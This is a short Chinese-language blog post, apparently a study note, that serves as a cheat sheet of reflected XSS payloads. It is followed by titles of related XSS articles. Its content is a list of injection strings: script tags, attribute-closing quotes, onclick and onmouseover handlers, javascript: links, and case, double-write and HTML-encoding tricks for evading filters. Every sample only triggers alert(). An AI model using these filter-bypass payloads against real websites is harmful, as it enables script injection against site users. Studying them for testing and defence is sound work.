反射型xss的常用语法

Xss反射型常用语法:

  1. 普通语法: <script>alert(1)</script>
  2. 构造闭合语法: "><script>alert(1)</script>
  3. 当引号被转义时的语法: 1' οnclick='alert(2)' 再次点击输入框时就会出现弹窗
  4. 当3.的双引号不行时则考虑使用双引号:1 "onclick"=alert(2)
  5. 当</>被过滤时便不能用标签可以考虑使用出发事件: 1" οnmοuseοver="alert(1)"
  6. 当5.的双引号不行时则考虑使用单引号: 1' οnmοuseοver='alert(1)'
  7. 当上述几种都不行时可以考虑使用a标签:11"><a href="javascript:alert(1)">
  8. 大小写绕过:11"><a HREF="javascript:alert(1)"> "><sCript>alert(1)</scRipt>

<SCRIPT>alert(1)</SCRIPT>

9.双写绕过:"><SCRSCRIPTIPT>alert(/xss/)</SCRSCRIPTIPT>

10.Html编码绕过:

javaSCRIPT:alert(1)

这里属于直接编码所所有的进行

把所需要过滤的字段进行html编码就可以进行绕过,这里绕过的时比如

href href

SCRIPT SCRIPT

相关推荐
味悲2 天前
浏览器解析机制与XSS的15种编码绕过
前端·xss
味悲4 天前
XSS、CSRF、SSRF学习笔记
安全·xss·csrf
Chengbei114 天前
SoloXSS:一款现代化的自托管 XSS平台
人工智能·安全·web安全·网络安全·自动化·xss·安全架构
德福危险5 天前
富有想象力的XSS盲打:靶机练习之Tempus_fugit5
服务器·网络·xss
德福危险5 天前
从盲打xss到到模板注入:unix靶机渗透之Tempus_fugit4
前端·unix·xss
憧憬成为web高手5 天前
皮卡丘靶场速通--XSS
前端·xss
Chengbei116 天前
全新ARL资产灯塔系统(重构版),多维闭环侦察体系,覆盖边界探测、指纹识别、信息收集检测全链路场景
人工智能·安全·web安全·网络安全·重构·系统安全·xss
ccino .6 天前
Hackerone-地址栏xss
网络安全·xss
txg6666 天前
路径级持久化模糊测试:XSSky 如何精准击破 XSS 漏洞
深度学习·安全·web安全·网络安全·xss
云水一下9 天前
DVWA从入门到精通(十一):XSS (Stored)(存储型XSS)
web安全·xss·dvwa·存储型